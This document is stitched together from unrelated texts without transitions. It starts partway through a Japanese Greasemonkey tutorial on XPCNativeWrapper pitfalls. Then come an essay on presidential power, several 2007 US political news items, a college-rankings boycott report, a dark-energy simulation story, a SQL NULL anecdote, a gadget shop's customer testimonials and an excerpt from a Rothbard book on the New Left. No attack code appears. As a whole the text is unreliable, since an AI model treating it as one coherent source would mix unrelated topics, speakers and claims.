これもまた失敗する。しかし全く違う理由による。document.getElementById関数はElementオブジェクトのXPCNativeWrapperによるラップを返す。Element自身ではない。これはつまり関数参照をelmLink.onclickに設定するということが、Elementのプロパティに設定するのではなく、XPCNativeWrapperのプロパティとして設定しているのだ。多くのプロパティ、例えばidやclassNameでは、XPCNativeWrapperは下位の要素の関連するプロパティに対して迂回した上で設定してくれる。しかしXPCNativeWrappersの実装上の制限により、このパススルーはonclickのようなイベントハンドラでは働かない。このコード例では実際の要素上には関連するonclickハンドラを設定していない。そしてリンクをクリックした時にmy_funcは実行されない。
これはイベントハンドラを設定できないということではない。ただ上の明らかな方法では設定できないということだ。たった一つのうまくいくテクニックとはaddEventListenerメソッドを用いることだ。 var elmLink = document .getElementById ( ' somelink ' ) ; elmLink.addEventListener( " click " , my_func , true ) ;
このテクニックは全ての要素にてうまく働く。windowやdocumentオブジェクトでもだ。全てのDOMイベント、clickやchange、submit、keypress、mousemove等でもうまくいく。document.getElementsByTagNameやdocument.getElementByIdを呼ぶことにより見つけたページ上に存在する要素でもうまくいく。またdocument.createElementを呼ぶことにより直接ページ上に作成した要素に対してもうまくいく。これがユーザスクリプトが適用されるコンテキスト上でもうまくいく唯一の方法である。
落とし穴#3：名前付きフォームとフォーム要素
Firefox はWebページ上の要素に対し色々なアクセス方法を提供する。例として、もし"gs"という名前のフォームがあり、" q "という名前のインプットボックスを持っているとしよう。
< form id = " gs " > < input name = " q " type = " text " value = " foo " > </ form > 普通ならインプットボックスの値を以下のように得ることができるであろう。 var q = document .gs.q.value ; ユーザスクリプト内ではこれは動かない。documentオブジェクトはXPCNativeWrapperであり、IDを用いて要素を取得する省略表現をサポートしない。つまりdocument.gsは未定義であり、そのためにステートメントの残りは失敗する。しかし例えdocumentのラッパーがIDによる要素の取得をサポートしているとしても、ステートメントは依然として失敗するだろう。なぜならば要素を包むXPCNativeWrapperは名前によりフォームフィールドを取得する省略表記をサポートしないからだ。これはdocument.gsがフォームの要素を返しても、document.gs.qはインプット要素を返さないことを意味する。従ってステートメントはまだ失敗する。
これらを修正するには、名前でフォームにアクセスするためにdocument.formsという配列のnamedItemメソッドを利用する必要がある。またフォームのフィールドに名前でアクセスするためにフォーム要素上の配列、elementsのnamedItemメソッドを利用する必要がある。 var form = document .forms.namedItem ( " gs " ) ; var input = form.elements.namedItem ( " q " ) ; var q = input.value ;
フォームと入力要素のために一時変数を使うことなく1行にまとめることもできる。しかしこれらのメソッドをそれぞれ呼ぶ必要があるし、返り値をいっしょに並べる必要がある。省略表記はない。
落とし穴#4：カスタムプロパティ JavaScriptはどのオブジェクトに対してもカスタムプロパティを定義することを許可している。それらをアサインするだけだ。この機能はWebページ上の要素にも広がり、任意の属性を作成し、要素のDOMオブジェクトに対し直接アサインすることが可能だ。 var elmFoo = document .getElementById ( ' foo ' ) ; elmFoo.myProperty = ' bar ' ; これ はGreasemonkeyのスクリプトでは働かない。なぜならばelmFooは実際にはfooと名づけられた要素にXPCNativeWrapperをラップしたものであり、XPCNativeWrapperはこの文法にてカスタム属性を定義することを許さない。idやhrefといった共通の属性を設定することはできる。しかしもし自分で決めたカスタム属性を定義したいのであれば、setAttributeメソッドを使う必要がある。 var elmFoo = document .getElementById ( ' foo ' ) ; elmFoo.setAttribute ( ' my Property ' , ' bar ' ) ;
もしこのプロパティに後でアクセスしたいのであれば、getAttributeメソッドを利用する必要がある。 var foo = elmFoo.getAttribute ( ' my Property ' ) ;
落とし穴#5：コレクションのイテレーティング 通常、document.getElementsByTagNameのようなメソッドはHTMLCollectionオブジェクトを返す。このオブジェクトはJavaScriptのArrayオブジェクトのように働く。lengthプロパティを持ちコレクションの要素の数を返す。" in"キーワードを用いることによりコレクションに含まれる全ての要素に対しイテレーションを行うことができる。 var arInputs = document .getElementsByTagName( " input " ) ; for ( var elmInput in arInputs ) { ... }
これ はGreasemonkeyのスクリプト内では動かない。なぜならばarInputsオブジェクトはHTMLCollectionオブジェクトをXPCNativeWrapperにてラップしたものであり、XPCNativeWrapperは" in"キーワードをサポートしない。その代わりにforループを用いてCollectionに対しイテレーションを行い、各要素への参照を分離して個々に取得する必要がある。 for ( var i = 0 ; i < arInputs.length ; i++) { var elmInput = arInputs [ i ] ; ... }
落とし穴#6：scrollIntoView 通常 のWebページのコンテキストでは、プログラムによりviewportを操作してページをスクロールさせることができる。例として次のコードはfooと名づけられたpage要素を見つけ、その要素が画面上に現れるようにブラウザのウィンドウをスクロールさせる。 var elmFoo = document .getElementById ( ' foo ' ) ; elmFoo.scrollIntoView ( ) ; これ はGreasemonkeyのスクリプトでは動かない。なぜならばelmFooはXPCNativeWrapperであり、XPCNativeWrapperは下層のラップされた要素のscrollIntoViewメソッドを呼びはしないからだ。その代わりXPCNativeWrapperオブジェクトの特別なwrappedJSObjectプロパティを使って実際の要素に対する参照を得なければ成らない。それからそのscrollIntoViewメソッドを呼ぶ。 var elmFoo = document .getElementById ( ' foo ' ) ; var elmUnderlyingFoo = elmFoo.wrappedJSObject || elmFoo ; elmUnderlyingFoo.scrollIntoView ( ) ; 重要なのは悪意あるページがscrollIntoViewメソッドをviewpointに対するスクロールの実行以外の何かに再定義している危険性があることに注意しなければならない。この問題に対しては一般的な解決方法は存在しない。
落とし穴 #7 ：Location 通常のJavaScriptのコードには現在のページのURLを操作する方法が幾らか存在する。window.locationオブジェクトは現在のURLに関する情報を保持する。完全なURLであるhrefや、ドメインネームであるhostname、ドメインネームの後ろに値するpathnameなどが含まれる。window.location.hrefに他のURLを設定することでプログラムにて新しいページへの移動が可能だ。しかしこれには省略記法が存在する。window.locationオブジェクトはそのhref属性をディフォルトのプロパティと定義している。これはつまり新しいページに移動するには単純にwindow.locationに対して設定を行えば良いことを意味する。 window .
location = " http://example.com/ " ;
通常のJavaScriptコードでは上記のコードはwindow.location.hrefプロパティに設定を行い、新しいページへと移動する。しかしGreasemonkeyのスクリプトではこれは動かない。なぜならばwindowオブジェクトはXPCNativeWrapperであり、XPCNativeWrapperはラップしたオブジェクトに対してディフォルトのプロパティへ設定を行う機能をサポートしないためだ。これはGreasemonekyスクリプト内にてwindow.locationの設定を行うことは実際に新しいページへ移動しないことを意味する。その代わりに明示的にwindow.location.hrefに対して設定を行う必要がある。 window .
location .href = " http://example.com/ " ;
これはまたdocument.locationオブジェクトに対しても当てはまる。
落とし穴#8：リモートページスクリプトの呼び出し
稀にユーザスクリプトはリモートページが定義した関数を呼ぶ必要に迫られる。例としてGoogleのWebメールサービスであるGmailに関わる幾つかのGreasemonkeyスクリプトが挙げられる。Gmailは非常にJavaScriptに依存しているため、それを拡張したいユーザスクリプトはオリジナルのページが定義した関数を呼ぶ必要が頻繁に発生する。 var searchForm = getNode ( " s " ) ; searchForm.elements.namedItem ( " q " ) .value = this .getRunnableQuery ( ) ; top .js._MH_OnSearch ( window , 0 ) ; オリジナルページのスクリプトはXPCNativeWrapperを引数に取ることを想定していない。ここで_MH_OnSearch関数はオリジナルのページにて定義され、最初の引数として本当のwindowを期待している。windowをラップしたXPCNativeWrapperではない。この問題を解決するためにGreasemonkeyは特別な値、unsafeWindowを定義しており、それは実際のwindowオブジェクトへの参照だ。 var searchForm = getNode ( " s " ) ; searchForm.elements.namedItem ( " q " ) .value = this .getRunnableQuery ( ) ; top .js._MH_OnSearch(unsafeWindow , 0 ) ; これは1つの理由によりunsafeWindow（安全ではないウィンドウ）と呼ばれている。そのプロパティとメソッドはリモートページにより仮想的にどんなものにでも再定義できるためだ。あなたがリモートページが危害を加えないことを完全に確信した場合を除いてunsafeWindowのメソッドを呼ぶべきではない。できる限りオリジナルページにて定義された関数への引数としてのみ使用するか、次の章にて示されるようにwindowのプロパティを監視する場合のみに利用するべきだ。
GreasemonkeyはまたunsafeDocumentも定義する。これは実際のdocumentオブジェクトだ。unsafeWindowと同じように、実際のdocumentオブジェクトを期待するページスクリプトに対する引数としてのみ利用すべきだ。
落とし穴 #9 ： watch この文章の最初にて筆者はwatchメソッドについて触れた。それは全てのJavaScriptオブジェクトにて有効だ。オブジェクトのプロパティに対するアサインメントに割り込むことを可能にする。例としてwindow.locationオブジェクトのwatchを設定することによりプログラムにより新しいページに移動させようとするスクリプトを監視することができる。 window .watch ( " location " , watchLocation ) ; window .
location .watch ( " href " , watchLocation ) ; ユーザスクリプトのコンテキストではこれは動かない。unsafeWindowオブジェクトに対してwatchを設定する必要がある。 unsafeWindow.watch ( " location " , watchLocation ) ; unsafeWindow .
location .watch ( " href " , watchLocation ) ; 注意が必要なのはこれはそれでも危険であり、悪意あるページがそれ自身のwatchメソッドを再定義する恐れがある。この問題に対する一般的な解決方法はまだない。
落とし穴#10 ：style JavaScriptでは、全ての要素はstyle属性を持つ。それにより要素のCSSスタイルを取得・設定することができる。Firefoxはまた複数のstyleを一度に変更する省略記法を持つ。 var elmFoo = document .getElementById( " foo " ) ; elmFoo.setAttribute( " style " , " margin:0 ; padding: 0 ; " ) ; これ はGreasemonkeyのスクリプトでは動かない。なぜならばdocument.getElementByIdから返されるオブジェクトはXPCNativeWrapperであり、XPCNativeWrapperはこのCSSスタイルを大量に設定する省略記法をサポートしない。個別にスタイルを設定する必要がある。 var elmFoo = document .getElementById( " foo " ) ; elmFoo.style.margin = 0 ; elmFoo.style .padding = 0 ;
The Security of Checks and Balances
Much of the political rhetoric surrounding the US presidential election centers around the relative security posturings of President George W. Bush and Senator John Kerry , with each side loudly proclaiming that his opponent will do irrevocable harm to national security .
Terrorism is a serious issue facing our nation in the early 21st century , and the contrasting views of these candidates is important .
But this debate obscures another security risk , one much more central to the US : the increasing centralisation of American political power in the hands of the executive branch of the government .
Over 200 years ago , the framers of the US Constitution established an ingenious security device against tyrannical government : they divided government power among three different bodies .
A carefully thought out system of checks and balances in the executive branch , the legislative branch , and the judicial branch , ensured that no single branch became too powerful .
After watching tyrannies rise and fall throughout Europe , this seemed like a prudent way to form a government .
Since 9/11 , the United States has seen an enormous power grab by the executive branch .
From denying suspects the right to a trial – and sometimes to an attorney – to the law - free zone established at Guantanamo , from deciding which ratified treaties to ignore to flouting laws designed to foster open government , the Bush administration has consistently moved to increase its power at the expense of the rest of the government .
The so - called “ Torture Memos , ” prepared at the request of the president , assert that the president can claim unlimited power as long as it is somehow connected with counterterrorism .
Presidential power as a security issue will not play a role in the upcoming US election .
Bush has shown through his actions during his first term that he favours increasing the powers of the executive branch over the legislative and the judicial branches .
Kerry ’s words show that he is in agreement with the president on this issue .
And largely , the legislative and judicial branches are allowing themselves to be trampled over .
In times of crisis , the natural human reaction is to look for safety in a single strong leader .
This is why Bush ’s rhetoric of strength has been so well - received by the American people , and why Kerry is also campaigning on a platform of strength .
Unfortunately , consolidating power in one person is dangerous .
History shows again and again that power is a corrupting influence , and that more power is more corrupting .
The loss of the American system of checks and balances is more of a security danger than any terrorist risk .
The ancient Roman Senate had a similar way of dealing with major crises .
When there was a serious military threat against the safety and security of the Republic , the long debates and compromise legislation that accompanied the democratic process seemed a needless luxury .
The Senate would appoint a single person , called a “ dictator ” ( Latin for “ one who orders ” ) to have absolute power over Rome in order to more efficiently deal with the crisis .
He was appointed for a period of six months or for the duration of the emergency , whichever period was shorter .
Sometimes the process worked , but often the injustices that resulted from having a dictator were worse than the original crisis .
Today , the principles of democracy enshrined in the US constitution are more important than ever .
In order to prevail over global terrorism while preserving the values that have made America great , the constitutional system of checks and balances is critical .
This is not a partisan issue ; I do n’t believe that John Kerry , if elected , would willingly lessen his own power any more than second - term President Bush would .
What the US needs is a strong Congress and a strong court system to balance the presidency , not weak ones ceding ever more power to the presidency .
Categories : Laws and Regulations , National Security Policy
Wexler to Dems :
Want a healthcare plan for children ?
Try impeachment hearings David Edwards and Jason Rhyne
Published : Wednesday December 12 , 2007
del.icio.us
Print This Email This Rep. Robert Wexler ( D - FL ) says he 's hatched a plan that will secure health care for children , help to restore America 's reputation around the world , and empower the the Democratic party to rediscover the courage of its convictions .
He calls it " impeachment hearings . "
Appearing in his home state for a meeting of the Palm Beach County Democratic Executive Committee last week , Wexler told the crowd that if Congress were to hold hearings on the impeachment of Vice President Dick Cheney , the move would advance a wide array of Democratic legislative priorities and even help a more " popular " United States head off foreign policy crises .
The remarks were first reported by the Palm Beach Post 's George Bennett .
" The way we pass stem - cell research , the way we get implemented a children 's health care plan , the way we get higher CAFE [ corporate average fuel economy ] standards to bring our energy debacle into a better condition for generations to come is to have impeachment hearings , " Wexler said , appearing to nearly run out breath at one point during his speech .
" Because that 'll get the president 's eye .
That 'll get the vice president 's eye .
That for the first time will show that the Democratic majority is here , and that in fact we have the courage of our convictions , and that we 're not bound to be tied by conventional wisdom . "
Wexler said that impeachment hearings were n't just an option available to Congress , but a requirement .
" This administration has abused its power in office ... and it is the obligation -- not discretionary -- but it is the obligation of this Congress to investigate , " he said .
" And that 's what I and some of my colleagues are beginning to call for . "
Later ,
Wexler suggested the US was sorely in need of popularity boost in the world community .
" If we want to stop Iran from becoming a nuclear power , we need to become more popular .
If we want to avoid a traumatic split between Sunnis and Shiites that endangers further our national security , we need to become more popular ...
If we want to engage with the Chinese in a more beneficial way , we need to become more popular . "
" Let me tell you one more thing those impeachment hearings will do , " he concluded .
" It 'll make America more popular . "
One of the House 's most outspoken critics of the Bush administration , Wexler voted against a motion from Democrats to prevent debate on a November impeachment motion brought against the vice president by Rep. Dennis Kucinich ( D - OH ) .
That measure was later sent to the House Judiciary Committee , where Wexler is a sitting member .
" I urge the Judiciary Committee to schedule impeachment hearings immediately and not let this issue languish as it has over the last six months , " Wexler stated at the time .
" Only through hearings can we begin to correct the abuses of Dick Cheney and the Bush Administration ; and , if it is determined in these hearings that Vice President Cheney has committed High Crimes and Misdemeanors , he should be impeached and removed from office . 
The Palm Beach Post has more here .
This video is from PalmBeachPost.com , broadcast on December 10 , 2007 .
The other day I was helping my wife debug a report she was trying to set up in her store operations software , and there was something screwy about the totals .
She was trying to set up an inventory change report that would reflect the changes of inventory levels at the store , for items that are also listed on her website , so she could update the website when items sold out or came back in .
For some reason , though , only the inventory arrivals were showing , not the sales .
I went in and changed the selection criteria to only select the sales , and that worked .
I put back in the other part of the query , something like “ ( arrived > 0 or sales > 0 ) ” , and then only the arrivals showed .
Frowning , I took out the “ arrived > 0 ” part again .
The sales showed up .
Then , just for the heck of it , I changed the query to “ ( sales >0 or arrived > 0 ) ” , and only the sales showed up .
“ This is weird , ” I said .
“ You know , I ’ll bet NULLs are probably the problem somehow . ”
And she said , “ What makes you say that ? ”
I laughed .
“ Because with SQL , NULLs are nearly always the problem . ”
( Postscript : I ’ll leave it as an exercise for the reader to figure out how they were the problem .
It ’ll be good for your SQL chops . )
Colbert :
Is the answer to the trauma of returning vets not to bring them home ?
Mike Aivaz and Muriel Kane
Published : Wednesday September 19 , 2007
Print This Email This
Susan Sarandon appeared on Tuesday 's Colbert Report to discuss her new film ,
In the Valley of Elah , which concerns a military cover -up of the murder of an Iraq War veteran
" I think it might start a dialogue about the fact that , actually , war changes you , " said Sarandon .
" There 's a big disconnect between the politicized war and the actual war .
...
All the guys who got us into this war never went to a war .
They avoided a war , so they do n't really have any idea what war means .
" They did n't avoid this war , " objected Colbert .
" They actively went after this war , "
" That 's so true , " agreed Sarandon .
" You 're saying there 's some trauma these people experience and they have to deal with that when they come home ? " asked Colbert .
" Is n't the answer , maybe , to not bring them home ?
I mean , the president has done his part in that regard . "
The following video is from Comedy Central 's Colbert Report , broadcast on September 18 , 2007 .
WASHINGTON , Oct. 18  The Senate Intelligence Committee voted Thursday night to approve compromise legislation that would strengthen court oversight of eavesdropping on Americans while granting telephone and Internet companies legal immunity for their role in assisting government surveillance programs since 2001 .
After nearly five hours of closed discussions , Senator John D. Rockefeller IV of West Virginia , the Democratic chairman , and Senator Christopher S. Bond of Missouri , the Republican vice chairman , emerged to announce that the measure had been approved in a 13 - to - 2 vote .
“ There were substantial compromises on the part of all members and , frankly , of the administration , ” Mr. Rockefeller said of the measure , which would expire in six years .
Two Democratic senators , Russ Feingold of Wisconsin and Ron Wyden of Oregon , cast the no votes .
But passage in the committee came with one unexpected hitch .
In an interview after the closed session , Mr. Wyden said he had succeeded , by a vote of 9 to 6 , in adding an amendment that would offer additional protections by requiring that the government get a warrant whenever it wanted to wiretap an American outside the country , like an American soldier based overseas or a business person .
WASHINGTON --
The Senate gave final congressional approval to an $ 850 billion increase in the public debt , the fifth such adjustment under President Bush and one reflecting the rising costs of the war in Iraq .
Adopted 53 - 42 , the revised $ 9.815 trillion ceiling is intended to give the Treasury enough borrowing authority to manage through the end of Mr. Bush 's presidency and into 2009 .
It ...
A revolt is brewing among college presidents against the influential college rankings put out each year by U.S. News & World Report .
Dozens of schools have recently refused to fill out surveys used to calculate ranks , and efforts are now afoot for a collective boycott .
Colleges have complained in the past about the rankings .
But recent events have rallied opposition , including the tying of presidential pay to ranking at Arizona State University and accusations by the president of Sarah Lawrence College that the magazine threatened to use hocus - pocus data to stand in for average SAT scores at the school .
At the heart of the matter : A college degree is increasingly expensive , and students and parents want to make informed decisions .
But educators worry that the rankings have made college a commodity , creating a false impression that schools can be easily compared and stressing out students who want only the " best " schools .
" This increasing interest in measuring everything – these so - called science - based measures of [ educational ] outcomes and the like – seems to me to be so misguided that it's now captured the imagination of the leadership in higher education , " says Christopher Nelson , president of St. John 's College in Annapolis , Md. , who heads an association of 124 prestigious liberal arts schools .
" This is a bad way of talking about an education .
[ Students ] are n't consumers shopping for a product . "
The boycott of the U.S. News rankings could be extended in coming weeks as a draft letter makes the rounds of academia .
The letter , formulated by a dozen college presidents and an education activist , calls for others to join them in neither filling out the magazine 's survey form nor touting rankings in marketing materials .
The " reputational survey , " as it's called , asks college administrators to rank the quality of hundreds of schools on a one to five scale .
The data – which critics call a " beauty contest " – account for 25 percent of the overall U.S. News rankings .
Several college presidents suggested that they personally could evaluate only five to 10 schools – a far cry from the hundreds on the list .
" We know each other through reputation , but that 's different than having the kind of intimate knowledge you should have when you are making a ranking , " says Robert Weisbuch , president of Drew University in Madison , N.J. , who plans to sign the letter .
The intent of the administrator survey is to capture the opinions of those who are experts inside the industry , says Brian Kelly , executive editor of U.S. News .
The survey asks them to rank only those schools with which they are familiar .
If that number is only five , says Mr. Kelly , " well , gee , maybe you need to know some more about your competitors . "
Last year , 70 percent of the reputational surveys were returned , according to the magazine .
If large numbers of schools stopped complying , Kelly says the magazine could query department chairmen , high school guidance counselors , and other knowledgeable sources .
" The reason the rankings are popular is that there is a great hunger among consumers to have some tangible data to use .
Some universities are unwilling to give people the information they want , " says Kelly , whose organization claims to use 50,000 pieces of data to derive the rankings .
" It 's not enough to say that this is an unquantifiable , nuanced world , particularly when you are charging people [ in some cases ] $ 50,000 a year . "
Students are desperate for honest , third - party comparisons , agrees Steven Goodman , a college admissions consultant in Washington .
" In a perfect world , there would be no need for any rankings because universities would be completely forthcoming about their strengths and weaknesses . "
College presidents emphasize that they do provide information to the public through the US Department of Education and their own websites .
But some expressed reservations about what happens when no data are available in particular categories .
When Sarah Lawrence College in Bronxville , N.Y. , stopped using SAT scores in its admissions process , U.S. News lost a key data point in its rankings formula .
The school 's president , Michele Tolela Myers , wrote a newspaper opinion piece saying that U.S.
News told her it might be forced to create a number by taking the average of other schools ' scores and then docking Sarah Lawrence by one standard deviation .
Kelly calls the incident a " miscommunication " and says his magazine will not use that method for the SAT score .
However , several presidents say the dust - up helped galvanize this year 's opposition to the survey , a movement joined by Dr. Myers .
There 's nothing wrong with sharing information , says Myers , but assigning weights to that information is " totally arbitrary . "
Students and parents may have different priorities , including location , diversity , and strength of a certain department – and their weights are bound to differ from those assigned by U.S. News .
Kelly says the magazine is working on employing technology that would allow users to select their own weights .
Colleges , meanwhile , are rethinking what metrics are useful and how to standardize them across higher education .
The US Department of Education , too , is pushing schools to provide more data on outputs , such as the number of students who go on to pass professional licensing exams or get advanced degrees .
" I 'm hopeful that whatever comes out of this [ boycott ] sends different kinds of signals and messages to students , so they realize that when they are in high school , they can follow their curiosity , " says Lloyd Thacker , lead author of the circulating letter and head of The Education Conservancy , a nonprofit in Portland , Ore .
Dark energy is probably the most influential force in the cosmos , overwhelming the pull of dark matter , and absolutely dominating the meager impact of regular matter .
And scientists have absolutely no idea what it is .
But a new supercomputer simulation by cosmologists at Durham University might give astronomers a few places to look ; to know how to measure this mysterious force .
When dark energy was discovered in 1998 , it came as a complete surprise .
By measuring the distance to supernovae , astronomers were hoping to calculate the rate at which the Universe ’s expansion is slowing down .
Instead of slowing down , though , they found that the expansion of the Universe is actually accelerating .
Instead of coming together in a big crunch , it looks like dark energy will spread the Universe out faster and faster .
Physicists now believe that dark energy makes up 70 % of the Universe , with the remaining amount made of mostly dark matter , and a sprinkling of regular matter .
Since that discovery , astronomers have n’t been able to find the source of this dark energy .
So a new simulation , run on Durham University ’s Cosmology Machine supercomputer could help astronomers in their search .
The simulation looked at the tiny ripples in the distribution of matter in the Universe made by sound waves a few hundred thousand years after the Big Bang .
These ripples have long since been destroyed by the 13.7 billion years of the lifetime of the Universe , but the simulations show they might have survived in some conditions .
By changing the nature of dark energy , the researchers found that the ripples changed in length .
In other words , if astronomers can find the ripples in the real Universe , this can help constrain the parameters for dark energy .
Durham University Professor Carlos Frenk said , “ the ripples are a gold standard .
By comparing the size of the measured ripples to the gold standard we can work out how the Universe has expanded and from this figure out the properties of the dark energy . ”
An upcoming ESA mission called the SPectroscopic All - sky Cosmic Explorer ( SPACE ) should have the capabilities to detect these ripples , and so help put some constraints on the nature of dark energy .
If all goes well , SPACE will launch in 2017 .
Original Source : Durham University News Release
Apple iPhone 6 16GB ( Gold )
Sale Price Rs.9999.00
Product Rating : Product Rating :
Send gift vouchers to your
friends & family .
FireWire ?
Also called iLink and IEEE 1394 , this fast connection interface is found on many camcorders , all new Macs and most PCs .
What do you have to say about our new GadgetsGuru.com upgraded website ?
Excellent
Good
Satisfactory
Poor I like to thanks to Gadgets Guru Team , for deliver my Product in quick time , as well as in Price , I am happy that I choose you .
Anil Kumar , Gurgaon , Haryana
It was great experience to online shoping with u ............ and the quick delivery of ordered items which i most admired ....!!
Rahul Dhanwate , Pune Its really nice service .
I love the way you pack and delivered it .
And i am looking the cheaper price for gadgets and other electronic goods in future .
sriramakrishnan s , Tamilnadu Gadgetsguru once again proved that the customer satisfaction is the atmost priority which cannot be compromised for anything .
I had a good experience from ordering online to receiving the parcel on time .
Keep up the good work .
Nirmal Kumar , Chennai
Thanks for your message .
Yes , I have received the products , which were processed under my order .
I am pretty happy with the prompt and quick action taken by Gadgetsguru Team pertaining to my order .
Your services and delivery of the products were excellent .
Satish Kumar , Aligarh I am very much satisfied with Gadget guru delivery process .
Its very fast as compared to other e-commerce sites that i have used .
Rohit Garg , Patiala
My order has arrived .
I must thank Pallavi and the team to have made this possible in such short time .
The product reached just in time to save my day ..
Amazing .
Keep up the good work .. :)
Kaushik Das , Bangalore Hi GG ,
Thanks a lot and i received the product within a short span of time .
Appreciate your commitment in getting the product delivered on before the timeline .
Regards , Keerthivasan keerthivasan Balasubramani , Tamilnadu Very Happy with your service specially the time you took for processing and delivery .
Thanks a lot for making my first online shopping memorable J Regards Nisheeth Nisheeth Nishant , Chennai I received the delivery before the committed time and I am delighted about it !
Thank you very much for your assistance in the entire process .
mariyam patanwala , Pune I have loved the prompt delivery and would like to extend my association further also Sandeep Umralkar , Mumbai I am living in Mizoram which is the North - Eastern tip State of India bordering Myanmar .
Gadgetsguru deliver my order within 4 days which is a completely new experience for me !
Amazing !
Gadgetsguru is recommended if your need is satisfaction guaranteed .
Malsawm Tluanga , Mizoram Gadgets
Guru is really great for getting me my iPad 2 safely on committed time .
It is a pleasant experience with the customer care team who are very cordial and made the delivery of iPad 2 which is having huge demand for stocks in India within the committed time .
I will place any further expensive electronics products only on gadgets guru online technology mall .
I thank very much for the shopping experience with them .-- Er.Devi Prasaad Kolhapur MH. Devi Prasaad Kolhapur
This is to inform you that I have received my acer aspire laptop 4738z securely and safely without any breakage and completely sealed through trackoncouriers service .
I am fully satisfied with your service which is truly great , prompt and excellent ...!
Thank you ...
With regards , Sonam Sonam Dorjee , Himachal Pradesh
Thank you so much for your great service and timely delivery of things .
Your mission and vision is a great one and it is a great help for many .
Once again I thank you for your care and assistance , and it was a nice experience in being contact with you .
I appreciate it .
Wish you all the success and Regards in your venture , Benoy ...
Benoy , Italy I ordered a belkin backpack , I received the product as shown on your website .
Excellent and amazingly fast service , Best online shopping experience for me .
Look forward to buy from you in future .
Thanks Rohit Rohit Singh , Delhi I have purchased Panasonic Cordless Phone KX - TG4312BX online through Gadget Guru .
The services offered by Gadget Guru is excellent , quick and most reliable .
The whole process from online transaction to delivery from Gadget Guru was smooth & excellent without any problems .
I am very glad to say that we get most latest products at most affordable price in Gadget Guru .
The cordless phone is working well and in excellent condition .
One more advantages of purchasing through Gadget Guru online is we also get miles credited to our account on every purchase if we are member of King Club of King Fisher Airlines .
Dr. PRAKASH B M , Mysore , Karnataka Hi , Received the Product - Nokia BH - 106 bluetooth headset in good condition .
The product is working well ...
Regards Deepak Trivandrum Dear GG , I am extremely happy and satisfied with the service / product given by you .
The speed of Delivery from Mumbai to delhi was like Local .
Actually , I have not experienced this speed of Online shopping before .
If this is the normal practice you do , then hats off to you .
Superb Pricing , Great deal & excellent service .
Cheers !
Akash Lal Excellent Service .
We can trust the Gadgets Guru .
The product that they deliver is not only cheaper but also 100 % upto customer 's satisfaction .
I 'll continue buying from Gadgets Guru .
Haribabu , Hyderabad , India I like to thanks to Gadgets Guru Team , for deliver my Product in quick time , as well as in Price , I am happy that I choose you .
Anil Kumar , Gurgaon , Haryana
Tags
[ This article is excerpted from the final chapter of The Betrayal of the American Right , now available in the bookstore . ]
For years now , Leonard Liggio and I had been looking for a " left , " for an antiwar movement , with which we could ally ourselves .
Then suddenly , as if by magic , the New Left emerged in American life , particularly in two great events : the Berkeley Free Speech Movement ( FSM ) of the fall of 1964 , which inaugurated the campus movement of the 1960s ; and the March on Washington of April 17 , 1965 , organized by the Students for a Democratic Society to protest the dramatic escalation of our war in Vietnam in February .
The SDS march inaugurated the great anti–Vietnam War movement , which undoubtedly constituted the deepest and most widespread opposition in the midst of war since the conflict with Mexico in the 1840s .
The opposition during World War I was strong , but isolated and brutally suppressed by the government ; the isolationist movement of World War II collapsed completely as soon as we entered the war ; and the Korean War never generated a powerful mass opposition .
But here at last was an exciting , massive opposition to the war proceeding during the war itself !
Another point that cheered Leonard and myself was that here at last was not a namby - pamby " peace " group like SANE , which always carefully balanced its criticism of the United States and of Russia , and which also took pains to exclude " undesirables " from antiwar activity ; here was a truly antiwar movement which zeroed in on the evils of American war making ; and here was a movement that excluded no one , that baited neither reds nor rightists , that welcomed all Americans willing to join in struggle against the immoral and aggressive war that we were waging in Vietnam .
Here at last was an antiwar Left that we could be happy about !
It is true that SDS , the unquestioned leader of this new antiwar movement , had been born in unfortunate circumstances ; for it was originally and was then still officially the student arm of the social democratic League for Industrial Democracy , an old - line socialist and red-baiting organization that represented the worst of Old Left liberalism .
But SDS was clearly in the process of breaking with its parentage .
Not only was it militant on the war , but it was also no longer doctrinaire socialist — a pleasant change indeed from the Old Left .
On the contrary , its ideology was vague enough to encompass even " right - wing libertarians . "
In fact , there was a good deal of instinctive libertarian sentiment in that early SDS which was to intensify for the next several years .
There was a new hunger for individual freedom , for self - development , and a new concern about bureaucracy and technocratic statism that boded well for SDS 's future .
Thus , SDS was shaping up as instinctively quasi-libertarian even on " domestic " issues .
This libertarianism was reinforced by the campus movement generated by the Berkeley Free Speech Movement .
For had n't conservatives and libertarians for decades been bitterly critical of our state - ridden educational system — its public schools , compulsory attendance laws , and giant , impersonal bureaucratic training factories replacing genuine education ?
Had n't we long been critical of the influence of John Dewey , the emphasis on vocational training , the giant tie-ins of education with government and the military - industrial complex ?
It was therefore not an accident that a newly developing " rightwing libertarian " group at Berkeley , headed by the young graduate math student Danny Rosenthal , should have helped lead the Free Speech and allied movements .
Rosenthal and his group , who founded the Alliance of Libertarian Activists in the Berkeley - San Francisco area and were also ardent Goldwaterites , fought alongside the New Left on behalf of freedom of speech and assembly , and in opposition to censorship and to the swollen bureaucratic establishment at Berkeley .
Rosenthal also exerted considerable influence on the views of Mario Savio , the famous FSM leader , though Savio was of course also subject to socialistic influences and pressures .
The emergence of the New Left persuaded Leonard and me that the time had come to act , to break out of our ideological and political isolation .
Hence we founded , in the spring of 1965 , the three - times - a - year journal Left and Right .
The purpose of founding L&R was twofold : to influence libertarians throughout the country to break with the right wing and to ally themselves with the emerging New Left and try to push that left further in a libertarian direction ; and second , to " find " the New Left ourselves as a group to ally with and possibly influence .
The first issue of Left and Right had three lengthy articles which managed to touch all of the important bases of our new libertarian " line " : my own article , " Left and Right : The Prospects for Liberty , " which set forth the Liggio analysis of the Left / Right historical spectrum ; Liggio 's own " Why the Futile Crusade ? " which brought back and portrayed the isolationist and anti-imperialist views of Senator Taft and the Taftite wing of the Republican Party ; and Alan Milchman 's review of Fleming 's Origins of the Cold War which , for the first time , brought Cold War revisionism to a libertarian audience .
In the second issue , in autumn 1965 , I wrote an article hailing the substantial libertarian elements of the New Left ( " Liberty and the New Left " ) .
I praised the New Left for taking up important libertarian and Old Right causes : opposition to bureaucracy and centralized government ; enthusiasm for Thoreau and the idea of civil disobedience to unjust laws ; a shift from Old Left compulsory racial integration to opposition to police brutality and what would soon be termed " black power " in black communities ; opposition to urban renewal and to restrictive and monopolistic labor unionism ; opposition to the Clark Kerr–type of modern educational bureaucracy ; and of course the total opposition to the American War in Vietnam .
In addition to comparing the educational views of Goodman and Nock , I also pointed to the hopeful sign of Goodman ( in his People or Personnel ) favorably treating a free - market economy .
The impact of Left and Right was remarkable , considering our paucity of subscribers and the total absence of funds .
For one thing , we immediately had considerable impact on conservative and libertarian youth .
